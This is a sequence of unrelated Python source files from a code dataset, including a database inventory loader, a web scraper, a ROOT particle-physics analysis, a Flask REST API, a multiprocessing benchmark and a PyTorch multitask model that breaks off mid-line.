\"Product\", \"descrip\", \"qtyavail\", \"qtyonhand\",\n \"qtyreservd\", \"qtycommit\", \"qtybo\", \"qtyintrans\", \"qtyonorder\", \"safeallamt\", \"orderpt\", \"linept\", \"lastcost\", \"baseprice\",\n \"addoncost\", \"transdt\", \"lastpowtdt\", \"lastrcptdt\", \"lastcntdt\", \"leadtmavg\"]\n for row in c:\n #remove \";\" from description\n row[4] = row[4].replace(';',' ')\n #change avalable to int\n row[5] = int(float(row[5]))\n row[15] = float(row[15])\n row[16] = float(row[16])\n row[17] = float(row[17])\n #date format\n row[18] = ttp.mmddyyyy(row[18])\n row[19] = ttp.mmddyyyy(row[19])\n row[20] = ttp.mmddyyyy(row[20])\n row[21] = ttp.mmddyyyy(row[21])\n self.productInv[row[3]] = row\n nominalusage = {}\n \"\"\" dic Format\n {cono-0:\n whse-1:\n prod-2: [lastmergedt-3, normusage-4]\n }\n \"\"\"\n def getnominalusage(self):\n #get nomusage and put into dic nomusage\n c = self.cursor.execute(\"SELECT icswu_0.cono, icswu_0.whse, icswu_0.prod, icswu_0.lastmergedt, icswu_0.normusage FROM NXT.PUB.icswu icswu_0\")\n for row in c:\n #create array to add to dic\n line = []\n #add last nomusage date\n tDate = row[3]\n if tDate != None:\n row[3] = tDate.strftime('%m/%d/%Y')\n line = (row[3], row[4])\n #build dic of dic\n if not row[0] in self.nominalusage:\n self.nominalusage[row[0]] = {}\n if not row[1] in self.nominalusage[row[0]]:\n self.nominalusage[row[0]][row[1]] = {}\n self.nominalusage[row[0]][row[1]][row[2]]=line\n\n #def __daterange(self, datelist):\n # self.datemax = max(datelist)\n # self,datemin = min(datelist)","sub_path":"DBConnect.py","file_name":"DBConnect.py","file_ext":"py","file_size_in_byte":19252,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"221749417","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport control\n\n\nplt.figure(1)\ndata = pd.read_csv('Vel0 - lazo abierto.txt',sep='\\s+',header=None)\nplt.plot(data)\nplt.title('Velocidad vs Tiempo - Caso Lazo Abierto' )\nplt.xlabel('Tiempo (20 ms)')\nplt.ylabel('Velocidad (RPM)')\n\nplt.figure(2)\nkp=1\nT=np.arange(0,50,0.01)\n\nnum=[1] # coeficientes del polinomios del numerador\nden = [1,1,1] # coeficientes del polinomios del denominador segundo orden\nH=control.TransferFunction(num,den) #funcion de transferencia(args_polinomiales= num, den)\nt,yout=control.step_response(H,T) #asignar funcion dentro del rango de tiempo\n\nplt.plot(t,yout)\n\nplt.grid (True)\nplt.axis([0,50,0,1.5]) #genera largo de ejes\nplt.title(\"Respuesta al escalon\", loc='center') #se genera titulo y se hace un label\nplt.xlabel(\"Tiempo (s)\");plt.ylabel(\"Salida y(t)\") #se generan ejes y se hace un label\n\nplt.show()\n","sub_path":"Control_Sistemas/pp0/pp0-lazo_abierto.py","file_name":"pp0-lazo_abierto.py","file_ext":"py","file_size_in_byte":902,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"57902366","text":"import sys\nfrom .record_core import process_line3, query_results, get_table, file_writer\nfrom ..file_io.locking import temp_path_from_file\nimport tempfile\n\ndef method_delete(context, meta):\n meta.table=get_table(context,meta)\n\n line_number = 1\n affected_rows = 0\n # if autocommit... create a temp copy everytime\n # if batch transaction, make 1 copy, always pull from that\n temp_data_file=context.get_data_file(meta.table)\n diff=[]\n\n column_count =meta.table.column_count()\n delimiter =meta.table.delimiters.field\n visible_whitespace=meta.table.visible.whitespace\n visible_comments =meta.table.visible.comments\n visible_errors =meta.table.visible.errors\n \n content_file=open(temp_data_file, 'r')\n try:\n dst_temp_filename=temp_path_from_file(meta.table.data.path,\"ddb_DST_DELETE\",unique=True)\n temp_file=file_writer(dst_temp_filename,'w')\n try:\n#\n for line in content_file:\n processed_line = process_line3(context,meta, line, line_number,column_count,delimiter,visible_whitespace,visible_comments, visible_errors)\n if None != processed_line['error']:\n context.add_error(processed_line['error'])\n line_number += 1\n # skip matches\n if True == processed_line['match']:\n affected_rows += 1\n diff.append(\"Deleted Line: {0}, {1}\".format(line_number-1,line))\n continue\n \n temp_file.write(processed_line['raw'])\n temp_file.write(meta.table.delimiters.get_new_line())\n finally:\n temp_file.close()\n finally:\n content_file.close()\n \n context.autocommit_write(meta.table,dst_temp_filename)\n context.auto_commit(meta.table)\n return query_results(success=True,affected_rows=affected_rows,diff=diff)\n","sub_path":"builds/ddb3cython/ddb3cython/methods/record_delete.py","file_name":"record_delete.py","file_ext":"py","file_size_in_byte":1918,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"472620333","text":"from bs4 import BeautifulSoup\nimport requests\nimport math\nfrom urllib import parse as urlparse\nfrom fieldnames import *\n\ndef parseMain(primaryLink):\n session = requests.Session()\n response = session.get(primaryLink)\n soup = BeautifulSoup(response.text, \"lxml\")\n pageButtons = soup.find_all(\"p\", {\"class\": \"pageButton\"})\n lastPage = pageButtons[-1]\n lastUrl = lastPage.find(\"a\").get(\"href\")\n fullLastUrl = urlparse.urljoin(primaryLink, lastUrl)\n parseResult = urlparse.urlparse(fullLastUrl)\n qs = urlparse.parse_qs(parseResult.query)\n maxPages = int(qs[\"paging\"][0])\n del qs[\"paging\"]\n parseWithFormat = parseResult._replace(query=urlparse.urlencode(qs))\n unparsed = urlparse.urlunparse(parseWithFormat)\n unparsed += \"&paging={}\"\n return session, unparsed, maxPages\n\ndef parseLocations(session, link):\n '''\n This gets the locations on one page of the website.\n type link: str\n rtype: [{str}]\n '''\n response = session.get(link)\n data = response.text\n soup = BeautifulSoup(data, \"lxml\")\n\n # get container for location data\n locationsContainer = soup.find(\"div\", {\"class\": \"item-container\"})\n\n locations = []\n\n for locationTag in locationsContainer.find_all(\"div\", {\"class\": \"normal-text list-item\"}):\n # location will store location name, phone number, and address\n location = {}\n\n locationNameTags = locationTag.find_all(\"div\", {\"class\": \"text-left font-weight-bold\"})\n\n # add location names to locations object\n # some locations have two lines\n location[NAME1] = locationNameTags[0].get_text(strip=True)\n if len(locationNameTags) > 1: location[NAME2] = locationNameTags[1].get_text(strip=True)\n \n locationDataTags = locationTag.find(\"div\", {\"class\": \"text-left main-info\"})\n\n locationDataDivs = locationDataTags.findChild().find_all(\"div\")\n #if len(locationDataDivs) > 0: location[PHONE] = locationDataDivs[0].get_text(strip=True)\n if len(locationDataDivs) > 1: location[ADDR1] = locationDataDivs[1].get_text(strip=True)\n if len(locationDataDivs) > 2: location[ADDR2] = locationDataDivs[2].get_text(strip=True)\n \n location[CATEGORY] = locationDataTags.find(\"div\", {\"class\": \"extra-info\"}).get_text(strip=True)\n \n infoDataTags = locationTag.find(\"div\", {\"class\": \"info-column\"})\n \n pdf = infoDataTags.find(\"a\", {\"class\": \"download-button\"}).get(\"href\").replace(' ', '%20')\n urlbase = 'https://saesdp.sccgov.org/sdpdocs/'\n assert pdf.startswith(urlbase) and '-' in pdf, pdf\n location[PDF] = pdf\n location['id'] = int(pdf[len(urlbase):pdf.find('-', len(urlbase))])\n \n extraInfoTags = infoDataTags.find(\"div\", {\"class\": \"extra-info\"})\n \n location[REPLACEMENT] = extraInfoTags.find(\"div\").get_text(strip=True)\n dateText = extraInfoTags.find(\"div\", {\"class\": \"text-right\"}).get_text(strip=True)\n if dateText.startswith(\"Date of Protocol Submission: \"):\n location[DATE] = dateText[len(\"Date of Protocol Submission: \"):]\n else:\n location[DATE] = dateText\n\n # store location in list locations\n locations.append(location)\n \n return locations\n\n","sub_path":"social_distance_spider.py","file_name":"social_distance_spider.py","file_ext":"py","file_size_in_byte":3069,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"497292197","text":"import argparse\nfrom math import atan, cos, exp, sin, sinh\nimport os\nimport sys\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport ROOT\n\nfrom various import dot, norm\n\n\n\n# Some ROOT global settings and styling\nROOT.TH1.SetDefaultSumw2()\n\n# load file and set up ID\nfile_path = '/Users/meister/Documents/ATLAS Open Data/DataEgamma.root'\n# file_path = '/Users/meister/Documents/ATLAS Open Data/mc_147770.Zee.root'\ntfile = ROOT.TFile(file_path)\nID = tfile.GetName().split('.')[-2].split('/')[-1]\nprint('Openend file {}'.format(file_path))\n\n# load the tree containing all the variables\ntree = ROOT.gDirectory.Get('mini')\n\n# set up output file\noutfile = ROOT.TFile.Open(\n '../root_files/efficiencies_{}'.format(file_path.split('/')[-1]), 'RECREATE')\noutfile.cd()\n\n# book histograms within the output file\nhistogram_probe_pT_before_selection = ROOT.TH1D(\n 'pT_before_selection',\n ' ; pT [MeV / c]; Entries', 120, 0, 120000\n)\nhistogram_probe_pT_after_selection = ROOT.TH1D(\n 'pT_after_selection',\n ' ; pT [MeV / c]; Entries', 120, 0, 120000\n)\nhistogram_ratio = ROOT.TH1D(\n 'ratio',\n ' ; pT [MeV / c] Entries', 120, 0, 120000\n)\n\n\ndef valid_electron(tree, electron_id):\n # trigger electrons\n if not tree.trigE:\n return False\n\n # good run list\n if not tree.passGRL:\n return False\n\n # found vertex\n if not tree.hasGoodVertex:\n return False\n\n # particle data group identifiers (e+ or e-)\n typ = tree.lep_type\n if not (abs(typ[1]) == abs(typ[0]) == 11):\n return False\n\n # charge (+- 1 e)\n charge = tree.lep_charge\n if not (charge[0] == - charge[1]):\n return False\n\n # pT cut\n pT = tree.lep_pt\n if not (pT[electron_id] >= 25e3):\n return False\n\n # tight ID\n tightID = tree.lep_flag[electron_id]\n if not (str(bin(tightID))[-10] == '1'):\n return False\n\n # check for valid invariant mass\n φ1, φ2 = tree.lep_phi\n η1, η2 = tree.lep_eta\n E1, E2 = tree.lep_E\n m1, m2 = 0, 0\n # momenta in x-y direction\n pT1 = tree.lep_pt[0] * np.array([cos(φ1), sin(φ1), 0])\n pT2 = tree.lep_pt[1] * np.array([cos(φ2), sin(φ2), 0])\n # total momenta\n p1 = pT1 + np.array([0, 0, tree.lep_pt[0] * sinh(η1)])\n p2 = pT2 + np.array([0, 0, tree.lep_pt[1] * sinh(η2)])\n\n m_inv = (abs(m1 ** 2 + m2 ** 2 + 2 * E1 * E2 - 2 * dot(p1, p2)))**.5\n m_inv_theo = 91e3\n if not (0.8 * m_inv_theo <= m_inv <= 1.2 * m_inv_theo):\n return False\n\n return True\n\n\n# setup list containing number of valid events after each selection criterion\nvalid_events = [0] * 13\n# set event_num\nevent_num = 500000 # tree.GetEntriesFast()\n# loop over events\nfor idx in range(event_num):\n nb = tree.GetEntry(idx)\n if nb <= 0:\n continue\n\n # check if exactly two leptons were found\n if tree.lep_n != 2:\n continue\n\n # apply weights\n if ID.startswith('Z'):\n weight = tree.mcWeight\n else:\n weight = 1\n\n # check tag electron\n if valid_electron(tree, 0):\n tag_id = 0\n probe_id = 1\n #if valid_electron(tree, 1):\n # tag_id = 1\n # probe_id = 0\n else:\n continue\n\n # fill histogram before selection\n pT = tree.lep_pt\n histogram_probe_pT_before_selection.Fill(pT[probe_id], weight)\n\n # check for tight ID, fill histogram after selection\n if str(bin(tree.lep_flag[probe_id]))[-10] == '1':\n histogram_probe_pT_after_selection.Fill(pT[probe_id], weight)\n\n\nhistogram_ratio.Divide(\n histogram_probe_pT_after_selection, histogram_probe_pT_before_selection,\n 1, 1, 'B'\n)\n\n# write to outfile\noutfile.cd()\nprint('Writing output to {}'.format(outfile.GetName()))\noutfile.Write()\n\n# allows to see the plot before python finishes\nROOT.TPython.Prompt()\n\n","sub_path":"F91_Z-Boson/py/task7.py","file_name":"task7.py","file_ext":"py","file_size_in_byte":3760,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"70428642","text":"from django.contrib import admin\nfrom django.urls import path\nfrom . import views\nurlpatterns = [\n path('login/', views.login_view, name='api-login'),\n path('logout/', views.logout_view, name='api-logout'),\n path('session/', views.session_view, name='api-session'),\n path('create_bartender/', views.create_bartender_view, name='api-create-bartender'),\n path('update_bartender/', views.update_bartender_view, name='api-update-bartender'),\n path('delete_bartender/', views.delete_bartender_view, name='api-delete-bartender'),\n path('get_bartenders/', views.get_bartenders_view, name='api-get-bartenders'),\n]","sub_path":"back-end/accounts/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":626,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"553558787","text":"import h5py\nimport numpy as np\n\ndef data_loader(file_to_load):\n\n # Loads the .hdf5 file\n hf = h5py.File(file_to_load,'r')\n \n # Finds the number of ODFs stored in the .hdf5\n numero_de_odf_salvas = len(hf.get('ODF').items())\n\n # Cria lista para armarezar ODFs e PeDFs\n ODF_SET = []\n PeDF_FULL_SET = []\n PeDF_PARTIAL_SET = []\n #coeffs = []\n\n # Extrai as ODFs, PeDFs, coeffs\n for i in range(0,numero_de_odf_salvas):\n ODF_SET.append(np.array(hf.get('ODF').get('ODF' + str(i))))\n PeDF_FULL_SET.append(np.array(hf.get('PeDFfull').get('PeDFfull' + str(i))))\n PeDF_PARTIAL_SET.append(np.array(hf.get('PeDFpartial').get('PeDFpartial' + str(i))))\n #coeffs.append(np.array(hf.get('coeffswav').get('coeffswav' + str(i))))\n\n bpm = np.array(hf.get('bpm').get('bpm'))\n\n # Saves in a dictionary\n data = {\n \"ODF_SET\": ODF_SET,\n \"PeDF_FULL_SET\": PeDF_FULL_SET,\n \"PeDF_PARTIAL_SET\": PeDF_PARTIAL_SET,\n \"bpm\": int(bpm)\n }\n \n hf.close()\n return data","sub_path":"data_loader.py","file_name":"data_loader.py","file_ext":"py","file_size_in_byte":1048,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"201956240","text":"import sys\nimport multiprocessing\nimport time\nimport random\nimport os\nfrom multiprocessing import Queue\n\ndef main():\n pass\n\nif __name__ == \"__main__\":\n main()\n\ndef run(cores,vals,timer):\n\n # Determine number of cores to use between 2 and 8, default is 8 if no args provided, or not {2<=number<8}\n if int(cores) >= 2 and int(cores) <= 8:\n numberCores = int(cores)\n else:\n numberCores = 8\n\n # Determine amount of calculations to run with args entry 2, default is 1000000 if no args or val > 10000000000\n if vals:\n val = vals\n if val > 10000000000:\n val = 1000000\n else:\n val = 1000000 #Array size\n\n # Determine sleep timer based on args, default is 5 seconds\n if timer:\n sleeptimer = float(timer)\n else:\n sleeptimer = 5 #increase this to allow child processes enough time to join parent\n\n\n #Initialize arrays based on arguments provided\n q = Queue() # used to save information generated within child process in separate core\n array1 = []\n array2 = []\n\n if numberCores > 2:\n array3 = []\n if numberCores > 3:\n array4 = []\n if numberCores > 4:\n array5 = []\n if numberCores > 5:\n array6 = []\n if numberCores > 6:\n array7 = []\n if numberCores > 7:\n array8 = []\n\n #Independent functions to fill arrays within separate cores with corresponding values\n\n multiVal= int(val/numberCores) # Splits val into [numberCores] parts, which will need to merge later\n def core1(n):\n for i in range(0,multiVal):\n array1.append(i)\n q.put(array1)\n\n def core2(n):\n for i in range(0,multiVal):\n array2.append(i + multiVal)\n q.put(array2)\n\n def core3(n):\n for i in range(0,multiVal):\n array3.append(i + (multiVal*2))\n q.put(array3)\n\n def core4(n):\n for i in range(0,int(val/numberCores)):\n array4.append(i + (multiVal*3))\n q.put(array4)\n\n def core5(n):\n for i in range(0,multiVal):\n array5.append(i + (multiVal*4))\n q.put(array5)\n\n def core6(n):\n for i in range(0,multiVal):\n array6.append(i + (multiVal*5))\n q.put(array6)\n\n def core7(n):\n for i in range(0,multiVal):\n array7.append(i + (multiVal*6))\n q.put(array7)\n\n def core8(n):\n for i in range(0,multiVal):\n array8.append(i + (multiVal*7))\n q.put(array8)\n\n # Separate processeses between [numberCores] cores\n\n for i in range(1): #Scaled to create between 2 to 8 cores based on args provided\n t = multiprocessing.Process(target=core1, args=(i,))\n t2 = multiprocessing.Process(target=core2, args=(i,))\n if numberCores > 2:\n t3 = multiprocessing.Process(target=core3, args=(i,))\n if numberCores > 3:\n t4 = multiprocessing.Process(target=core4, args=(i,))\n if numberCores > 4:\n t5 = multiprocessing.Process(target=core5, args=(i,))\n if numberCores > 5:\n t6 = multiprocessing.Process(target=core6, args=(i,))\n if numberCores > 6:\n t7 = multiprocessing.Process(target=core7, args=(i,))\n if numberCores > 7:\n t8 = multiprocessing.Process(target=core8, args=(i,))\n\n # 'daemon = true' stops the parent process from having to wait for child processes to end before terminating.\n t.daemon = True\n t2.daemon = True\n if numberCores > 2:\n t3.daemon = True\n if numberCores > 3:\n t4.daemon = True\n if numberCores > 4:\n t5.daemon = True\n if numberCores > 5:\n t6.daemon = True\n if numberCores > 6:\n t7.daemon = True\n if numberCores > 7:\n t8.daemon = True\n\n # START TIMER, run processes\n start = time.time()\n\n t.start() #start processes\n t2.start()\n if numberCores > 2:\n t3.start()\n if numberCores > 3:\n t4.start()\n if numberCores > 4:\n t5.start()\n if numberCores > 5:\n t6.start()\n if numberCores > 6:\n t7.start()\n if numberCores > 7:\n t8.start()\n\n mylist = [] #Used to retrieve values from queue sequentially\n\n time.sleep(sleeptimer)\n\n #Get objects in queue\n if q.empty():\n print(\"\\nFail: Timer too short to allow child processes enough time to join parent\\nProgram terminated\\n\")\n sys.exit(0)\n #while not q.empty():\n # mylist.append(q.get())\n\n #Merge objects from queue into a single array\n mergedArray = []\n for n in range(0,numberCores):\n mergedArray = mergedArray + q.get()\n\n #TOTAL operating time of split loops\n # print(\"\\nTotal time multi:\")\n multiTime = (time.time()-start) -sleeptimer\n #print(multiTime)\n\n\n\n #Compare with making a single array on one core\n array = []\n newstart = time.time()\n for j in range (0,val):\n array.append(j)\n time.sleep(sleeptimer)\n # print(\"\\nTotal time single: \")\n singleTime = (time.time()-newstart)-sleeptimer\n #print(singleTime)\n\n\n #print(\"\\nEfficiency ratio:\\n\",(multiTime/singleTime), \"\\n\")\n return (multiTime,singleTime)\n\n\n","sub_path":"newfile/multiCoreTest.py","file_name":"multiCoreTest.py","file_ext":"py","file_size_in_byte":5581,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"226823519","text":"# Tai Sakuma \nimport logging\nimport pytest\n\nimport alphatwirl\nfrom alphatwirl.progressbar import atpbar\n\ntry:\n import unittest.mock as mock\nexcept ImportError:\n import mock\n\n##__________________________________________________________________||\n@pytest.fixture()\ndef mock_report_progress(monkeypatch):\n ret = mock.Mock()\n monkeypatch.setattr(alphatwirl.progressbar, 'report_progress', ret)\n return ret\n\n@pytest.fixture()\ndef mock_report_progress_raise(monkeypatch):\n ret = mock.Mock()\n ret.side_effect = Exception\n monkeypatch.setattr(alphatwirl.progressbar, 'report_progress', ret)\n return ret\n\n##__________________________________________________________________||\nclass Iter(object):\n def __init__(self, content):\n self.content = content\n\n def __repr__(self):\n return self.__class__.__name__\n\n def __len__(self):\n return len(self.content)\n\n def __iter__(self):\n for e in self.content:\n yield e\n\n##__________________________________________________________________||\ncontent = [mock.sentinel.item1, mock.sentinel.item2, mock.sentinel.item3]\n\n##__________________________________________________________________||\ndef test_atpbar_name_repr(mock_report_progress, caplog):\n\n iterable = Iter(content)\n returned = [e for e in atpbar(iterable)]\n\n ##\n assert content == returned\n\n ##\n assert len(content) + 1 == len(mock_report_progress.call_args_list)\n for i, c in enumerate(mock_report_progress.call_args_list):\n args, kwargs = c\n report = args[0]\n assert i == report.done\n assert len(content) == report.total\n assert 'Iter' == report.name # repr(iterable)\n print(report)\n\n##__________________________________________________________________||\ndef test_atpbar_name_given(mock_report_progress, caplog):\n\n iterable = Iter(content)\n returned = [e for e in atpbar(iterable, name='given')]\n\n ##\n assert content == returned\n\n ##\n assert len(content) + 1 == len(mock_report_progress.call_args_list)\n for i, c in enumerate(mock_report_progress.call_args_list):\n args, kwargs = c\n report = args[0]\n assert i == report.done\n assert len(content) == report.total\n assert 'given' == report.name\n print(report)\n\n##__________________________________________________________________||\ndef test_atpbar_raise(mock_report_progress_raise, caplog):\n\n iterable = Iter(content)\n returned = [e for e in atpbar(iterable, name='given')]\n\n ##\n assert content == returned\n\n##__________________________________________________________________||\n","sub_path":"tests/unit/progressbar/test_atpbar.py","file_name":"test_atpbar.py","file_ext":"py","file_size_in_byte":2651,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"491736457","text":"__author__ = 'duckoteka'\n\nimport flask\nimport flask_sqlalchemy\nimport flask_restless\n\nfrom config import config\n\napp = flask.Flask(__name__)\napp.config['DEBUG'] = config['debug']\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\n\n\napp.config['SQLALCHEMY_DATABASE_URI'] = config['comments']['db_uri']\ndb = flask_sqlalchemy.SQLAlchemy(app)\n\nclass Comment(db.Model):\n __tablename__ = 'comment'\n\n id = db.Column(db.Integer, primary_key=True)\n user_id = db.Column(db.Integer, nullable=False)\n date = db.Column(db.DateTime, nullable=False)\n text = db.Column(db.Unicode, nullable=False)\n\ndb.create_all()\n\n\nrestman = flask_restless.APIManager(app, flask_sqlalchemy_db=db)\nrestman.create_api(Comment,\n collection_name='comments',\n methods=[\n 'GET',\n 'POST',\n 'PUT',\n 'PATCH',\n 'DELETE'\n ],\n)\n\n\nif __name__ == '__main__':\n app.run(port=config['comments']['port'])","sub_path":"comments.py","file_name":"comments.py","file_ext":"py","file_size_in_byte":918,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"348183412","text":"\"\"\"Utility functions to talk to the dataflow service.\"\"\"\nfrom oauth2client.client import GoogleCredentials\nfrom googleapiclient import discovery\n\n\ndef get_job_status(project_id, flow_name):\n \"\"\" Returns the status of a dataflow job given a job name.\"\"\"\n credentials = GoogleCredentials.get_application_default()\n client = discovery.build('dataflow', 'v1b3', credentials=credentials)\n\n req = client.projects().jobs().list(projectId=project_id)\n while req is not None:\n res = req.execute()\n for job in res['jobs']:\n if all(['name' in job, job['name'] == flow_name,\n job['currentState'] == 'JOB_STATE_RUNNING']):\n return job['id']\n req = client.projects().jobs().list_next(previous_request=req, previous_response=res)\n return None\n","sub_path":"dataflowlauncher/utils/dataflow_utils.py","file_name":"dataflow_utils.py","file_ext":"py","file_size_in_byte":812,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"301439299","text":"import pyautogui\r\n\r\nchoice = pyautogui.confirm(text='是否截取全屏', title='confirm', buttons=['OK', 'Cancel'])\r\nif choice is 'OK':\r\n save = pyautogui.prompt(text='输入截图名称:', title='prompt')\r\n im = pyautogui.screenshot(save + '.png')\r\n pyautogui.alert(text='截图完毕', title='alert', button='OK')\r\nelse :\r\n pyautogui.alert(text='程序已结束', title='alert', button='OK')\r\n \r\n\r\n","sub_path":"students/Gongyangyang/auto_test/screenshot.py","file_name":"screenshot.py","file_ext":"py","file_size_in_byte":418,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"126863847","text":"\r\n\r\nimport torch\r\nimport torch.utils.data as data_utils\r\nimport torch.autograd as autograd\r\nimport torch.nn as nn\r\nimport torch.optim as optim\r\nimport torch.nn.functional as F\r\nfrom torch.utils.data import Dataset, DataLoader\r\nfrom torch.nn.utils.clip_grad import clip_grad_norm_\r\n\r\nfrom pytorch_models.recurrent import Recurrent\r\n\r\nfrom tensorboardX import SummaryWriter\r\n\r\n\r\n#current_time = str(datetime.datetime.now().timestamp())\r\n#train_log_dir = '/g/ssli/transitory/lybarger/clinicalIE/analyses/20190313_fast/step670_cv_predict_Multitask/' + current_time\r\n#test_log_dir = 'logs/tensorboard/test/' + current_time\r\n#train_summary_writer = summary.create_file_writer(train_log_dir)\r\n#test_summary_writer = summary.create_file_writer(test_log_dir)\r\n\r\nimport os\r\nimport errno\r\nfrom datetime import datetime\r\nfrom tqdm import tqdm\r\nimport numpy as np\r\nimport logging\r\nfrom tqdm import tqdm\r\nimport joblib\r\nimport math\r\n\r\nfrom pytorch_models.crf import MultitaskCRF\r\nfrom pytorch_models.attention import MultitaskAttention\r\nfrom utils.misc import nested_dict_to_list, list_to_nested_dict\r\nfrom constants import STATUS, STATUS_SEQ, INDICATOR\r\nfrom constants import INDICATOR_SEQ, SEQ_TAGS\r\nfrom constants import TRIGGER, STATUS_SPAN\r\n\r\n\r\ndef argmax(vec):\r\n # return the argmax as a python int\r\n _, idx = torch.max(vec, 1)\r\n return idx\r\n\r\n\r\n\r\ndef load_word_embed(path, freeze=True):\r\n '''\r\n Load word embeddings and create map\r\n '''\r\n\r\n # Load model\r\n model = joblib.load(path) \r\n \r\n # Get embeddings and format\r\n embed = model.word_embed().astype(np.float32)\r\n \r\n # Get word embeddings shape \r\n shape = embed.shape\r\n \r\n # Convert to embedding layer\r\n embed = torch.from_numpy(embed)\r\n embed = torch.nn.Embedding.from_pretrained( \\\r\n embeddings = embed,\r\n freeze = freeze)\r\n \r\n # Get word embedding mapping\r\n map_ = model.word_map()\r\n \r\n return (embed, map_, shape)\r\n\r\ndef max_grad(parameters):\r\n '''\r\n Get maximum gradient\r\n ''' \r\n \r\n # Get parameters with gradient\r\n param_with_grad = [p for p in parameters if p.grad is not None]\r\n \r\n # Calculate maximum gradient across all parameters\r\n max_grad = max(p.grad.data.abs().max() for p in param_with_grad)\r\n \r\n return max_grad\r\n\r\ndef merge_entities(a, b, entity):\r\n \r\n for event, val in b.items():\r\n if event not in a.keys():\r\n a[event] = {}\r\n a[event][entity] = val\r\n return a\r\n \r\n\r\n\r\n\r\nclass MultitaskEstimator(nn.Module):\r\n '''\r\n \r\n \r\n args:\r\n rnn_type: 'lstm'\r\n rnn_input_size: The number of expected features in the input x\r\n rnn_hidden_size: The number of features in the hidden state h\r\n rnn_num_layers: Number of recurrent layers\r\n rnn_bias: If False, then the layer does not use bias weights b_ih and b_hh.\r\n rnn_batch_first: If True, then the input and output tensors are provided as (batch, seq, feature).\r\n rnn_dropout = If non-zero, introduces a Dropout layer on the \r\n outputs of each LSTM layer except the last layer, \r\n with dropout probability equal to dropout.\r\n rnn_bidirectional: If True, becomes a bidirectional LSTM. \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n https://medium.com/@martinpella/how-to-use-pre-trained-word-embeddings-in-pytorch-71ca59249f76\r\n '''\r\n\r\n\r\n\r\n def __init__(self, \\\r\n \r\n # Labels\r\n events,\r\n mapping, \r\n \r\n # Word embeddings\r\n word_embed_source = None, \r\n word_embed_path = None,\r\n word_embed_dropout = 0, \r\n bert_source = None,\r\n bert_path = None,\r\n use_bert = False, \r\n \r\n \r\n # Recurrent layer\r\n rnn_type = 'lstm',\r\n rnn_input_size = 768, \r\n rnn_hidden_size = 100, \r\n rnn_num_layers = 1,\r\n rnn_bias = True,\r\n rnn_dropout = 0.0,\r\n rnn_bidirectional = True,\r\n rnn_stateful = False,\r\n rnn_layer_norm = True,\r\n\r\n \r\n # Attention\r\n attn_type = 'dot_product',\r\n attn_dropout = 0,\r\n \r\n # CRF\r\n crf_constraints = None,\r\n crf_include_start_end_transitions = True,\r\n \r\n # Logging\r\n log_dir = None,\r\n log_subfolder = True,\r\n \r\n # Training\r\n max_len = 50,\r\n num_epochs = 100,\r\n batch_size = 50,\r\n num_workers = 6,\r\n learning_rate = 0.005,\r\n grad_max_norm = 1,\r\n \r\n \r\n ):\r\n super(MultitaskEstimator, self).__init__()\r\n\r\n\r\n # Labels\r\n self.events = events\r\n self.mapping = mapping\r\n self.entities = [INDICATOR, STATUS, SEQ_TAGS, TRIGGER, STATUS_SPAN]\r\n \r\n # Word embeddings \r\n self.word_embed_source = word_embed_source\r\n self.word_embed_path = word_embed_path\r\n self.word_embed_dropout = word_embed_dropout\r\n self.use_bert = use_bert \r\n \r\n # Recurrent layer\r\n self.rnn_type = rnn_type\r\n self.rnn_input_size = rnn_input_size\r\n self.rnn_hidden_size = rnn_hidden_size\r\n self.rnn_num_layers = rnn_num_layers\r\n self.rnn_bias = rnn_bias\r\n self.rnn_dropout = rnn_dropout\r\n self.rnn_bidirectional = rnn_bidirectional\r\n self.rnn_stateful = rnn_stateful\r\n self.rnn_layer_norm = rnn_layer_norm\r\n self.rnn_batch_first = True \r\n \r\n\r\n \r\n # Attention\r\n self.attn_type = attn_type\r\n self.attn_dropout = attn_dropout\r\n self.attn_normalize = True \r\n \r\n # CRF\r\n self.crf_constraints = crf_constraints\r\n self.crf_include_start_end_transitions = \\\r\n crf_include_start_end_transitions\r\n \r\n # Logging\r\n self.log_dir = log_dir\r\n self.log_subfolder = log_subfolder\r\n \r\n # Training\r\n self.max_len = max_len\r\n self.num_epochs = num_epochs\r\n self.batch_size = batch_size\r\n self.num_workers = num_workers\r\n self.learning_rate = learning_rate\r\n self.grad_max_norm = grad_max_norm\r\n \r\n \r\n\r\n \r\n # Get label maps\r\n self.label_to_id, self.id_to_label = multitask_map(self.mapping)\r\n self.num_tags = {event: {entity: len(map_) \\\r\n for entity, map_ in entities.items()} \\\r\n for event, entities in mapping.items()}\r\n \r\n # Load word embeddings\r\n if use_bert:\r\n self.word_to_id = None \r\n \r\n else:\r\n W, map_ , (r, c) = load_word_embed(self.word_embed_path)\r\n self.word_embed_matrix = W\r\n self.word_to_id = map_\r\n self.word_embed_num = r\r\n self.word_embed_dim = c\r\n \r\n # Overwrite RNN input size\r\n if self.word_embed_dim != self.rnn_input_size:\r\n logging.warn(\"Overriding rnn_input_size with word_embed_dim\")\r\n self.rnn_input_size = self.word_embed_dim\r\n \r\n\r\n # Input dropout\r\n self.input_dropout_layer = nn.Dropout(p=self.dropout_input)\r\n\r\n\r\n self.rnn = 